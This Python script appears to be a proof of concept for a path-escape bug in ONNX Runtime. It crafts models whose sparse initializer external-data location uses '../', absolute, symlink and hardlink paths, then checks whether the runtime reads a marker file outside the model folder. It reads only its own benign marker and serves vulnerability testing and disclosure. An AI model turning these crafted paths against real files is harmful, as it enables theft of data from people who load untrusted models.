| from __future__ import annotations |
|
|
| import hashlib |
| import os |
| import shutil |
| import subprocess |
| import sys |
| from pathlib import Path |
|
|
| import numpy as np |
| import onnx |
| import onnxruntime as ort |
| from onnx import TensorProto, helper, numpy_helper |
|
|
|
|
| ROOT = Path(__file__).resolve().parent |
| MODEL_DIR = ROOT / "model_dir" |
| OUTSIDE_DIR = ROOT / "outside_dir" |
| MARKER = b"ORT_SPARSE_INITIALIZER_EXT_READ" |
|
|
|
|
| def sha256(path: Path) -> str: |
| return hashlib.sha256(path.read_bytes()).hexdigest() |
|
|
|
|
| def make_external_values(location: str) -> TensorProto: |
| values = TensorProto() |
| values.name = "sparse_init" |
| values.data_type = TensorProto.UINT8 |
| values.dims.append(len(MARKER)) |
| values.data_location = TensorProto.EXTERNAL |
| values.external_data.add(key="location", value=location) |
| values.external_data.add(key="offset", value="0") |
| values.external_data.add(key="length", value=str(len(MARKER))) |
| return values |
|
|
|
|
| def make_model(model_path: Path, location: str) -> None: |
| values = make_external_values(location) |
| indices_array = np.arange(len(MARKER), dtype=np.int64).reshape(len(MARKER), 1) |
| indices = numpy_helper.from_array(indices_array, name="sparse_indices") |
| sparse = helper.make_sparse_tensor(values, indices, [len(MARKER)]) |
| output = helper.make_tensor_value_info("out", TensorProto.UINT8, [len(MARKER)]) |
| identity_node = helper.make_node("Identity", inputs=["sparse_init"], outputs=["out"]) |
| graph = helper.make_graph( |
| nodes=[identity_node], |
| name="sparse_initializer_external", |
| inputs=[], |
| outputs=[output], |
| sparse_initializer=[sparse], |
| ) |
| model = helper.make_model( |
| graph, |
| producer_name="onnx-ort-sparse-initializer-external-poc", |
| opset_imports=[helper.make_opsetid("", 18)], |
| ) |
| model.ir_version = 10 |
| onnx.save_model(model, model_path) |
|
|
|
|
| def build_cases() -> dict[str, Path]: |
| for path in (MODEL_DIR, OUTSIDE_DIR): |
| if path.exists(): |
| shutil.rmtree(path) |
| path.mkdir(parents=True) |
|
|
| outside_marker = OUTSIDE_DIR / "marker.bin" |
| outside_marker.write_bytes(MARKER) |
| (MODEL_DIR / "inside.bin").write_bytes(MARKER) |
| os.symlink("../outside_dir", MODEL_DIR / "link_parent", target_is_directory=True) |
| os.link(outside_marker, MODEL_DIR / "hardlink.bin") |
|
|
| cases = { |
| "inside_regular": "inside.bin", |
| "dotdot_escape": "../outside_dir/marker.bin", |
| "absolute_escape": str(outside_marker.resolve()), |
| "parent_symlink_escape": "link_parent/marker.bin", |
| "hardlink_escape": "hardlink.bin", |
| } |
| paths: dict[str, Path] = {} |
| for name, location in cases.items(): |
| path = MODEL_DIR / f"{name}.onnx" |
| make_model(path, location) |
| paths[name] = path |
| return paths |
|
|
|
|
| def run(code: str, cwd: Path, *args: Path | str) -> subprocess.CompletedProcess[str]: |
| return subprocess.run( |
| [sys.executable, "-c", code, *map(str, args)], |
| cwd=cwd, |
| text=True, |
| capture_output=True, |
| check=False, |
| timeout=30, |
| ) |
|
|
|
|
| def emit(name: str, result: subprocess.CompletedProcess[str]) -> None: |
| stdout = result.stdout.strip().replace("\n", " | ") |
| stderr = result.stderr.strip().replace("\n", " | ") |
| print(f"{name}_rc={result.returncode}") |
| print(f"{name}_stdout={stdout}") |
| print(f"{name}_stderr={stderr}") |
|
|
|
|
| def main() -> int: |
| paths = build_cases() |
| outside_marker = OUTSIDE_DIR / "marker.bin" |
| print(f"python={sys.version.split()[0]}") |
| print(f"onnx={onnx.__version__}") |
| print(f"onnxruntime={ort.__version__}") |
| print(f"case_dir={ROOT}") |
| print(f"outside_marker={outside_marker}") |
| print(f"outside_marker_sha256={sha256(outside_marker)}") |
| print(f"hardlink_count={os.stat(MODEL_DIR / 'hardlink.bin').st_nlink}") |
| print(f"hardlink_same_inode={os.stat(MODEL_DIR / 'hardlink.bin').st_ino == os.stat(outside_marker).st_ino}") |
|
|
| checker_code = """ |
| import onnx, sys |
| onnx.checker.check_model(sys.argv[1]) |
| print("checker_ok") |
| """ |
| onnx_load_code = """ |
| import onnx, sys |
| model = onnx.load(sys.argv[1]) |
| print("load_ok") |
| """ |
| ort_code = """ |
| import onnxruntime as ort, sys |
| sess = ort.InferenceSession(sys.argv[1], providers=["CPUExecutionProvider"]) |
| out = sess.run(None, {})[0] |
| print(bytes(out.tolist()).decode("ascii", errors="replace")) |
| """ |
| ort_bytes_code = """ |
| import onnxruntime as ort, sys |
| so = ort.SessionOptions() |
| so.add_session_config_entry("session.model_external_initializers_file_folder_path", sys.argv[2]) |
| data = open(sys.argv[1], "rb").read() |
| sess = ort.InferenceSession(data, so, providers=["CPUExecutionProvider"]) |
| out = sess.run(None, {})[0] |
| print(bytes(out.tolist()).decode("ascii", errors="replace")) |
| """ |
|
|
| hits: list[str] = [] |
| for name, path in paths.items(): |
| print(f"{name}:model={path}") |
| print(f"{name}:model_sha256={sha256(path)}") |
| for label, code, cwd, args in [ |
| ("onnx_checker", checker_code, MODEL_DIR, [path.name]), |
| ("onnx_load", onnx_load_code, MODEL_DIR, [path.name]), |
| ("ort_file_relative", ort_code, MODEL_DIR, [path.name]), |
| ("ort_file_absolute", ort_code, ROOT, [path]), |
| ("ort_bytes_with_folder", ort_bytes_code, ROOT, [path, MODEL_DIR]), |
| ]: |
| result = run(code, cwd, *args) |
| emit(f"{name}_{label}", result) |
| if name != "inside_regular" and label.startswith("ort_") and result.returncode == 0 and MARKER.decode("ascii") in result.stdout: |
| hits.append(f"{name}:{label}") |
|
|
| if hits: |
| print(f"impact=sparse_initializer_external_data_bypass:{','.join(hits)}") |
| return 0 |
|
|
| print("impact=no_sparse_initializer_external_data_bypass") |
| return 1 |
|
|
|
|
| if __name__ == "__main__": |
| raise SystemExit(main()) |
|
|